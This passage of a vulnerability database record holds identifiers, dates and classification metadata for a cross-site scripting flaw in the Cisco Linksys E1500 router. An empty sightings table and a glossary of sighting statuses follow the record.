"id": "CNVD-2013-00966"
},
{
"date": "2013-02-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00965"
},
{
"date": "2013-05-23T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00904"
},
{
"date": "2013-02-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00962"
},
{
"date": "2013-02-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00964"
},
{
"date": "2013-02-17T00:00:00",
"db": "CNVD",
"id": "CNVD-2013-00963"
},
{
"date": "2013-04-02T16:17:00",
"db": "BID",
"id": "57760"
},
{
"date": "2013-02-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201302-141"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201302-141"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Cisco Linksys E1500 Router Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2013-00966"
}
],
"trust": 0.6
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Input Validation Error",
"sources": [
{
"db": "BID",
"id": "57760"
}
],
"trust": 0.3
}
}
Sightings
| Author | Source | Type | Date |
|---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or observed by the user.
- Confirmed: The vulnerability has been validated from an analyst's perspective.
- Published Proof of Concept: A public proof of concept is available for this vulnerability.
- Exploited: The vulnerability was observed as exploited by the user who reported the sighting.
- Patched: The vulnerability was observed as successfully patched by the user who reported the sighting.
- Not exploited: The vulnerability was not observed as exploited by the user who reported the sighting.
- Not confirmed: The user expressed doubt about the validity of the vulnerability.
- Not patched: The vulnerability was not observed as successfully patched by the user who reported the sighting.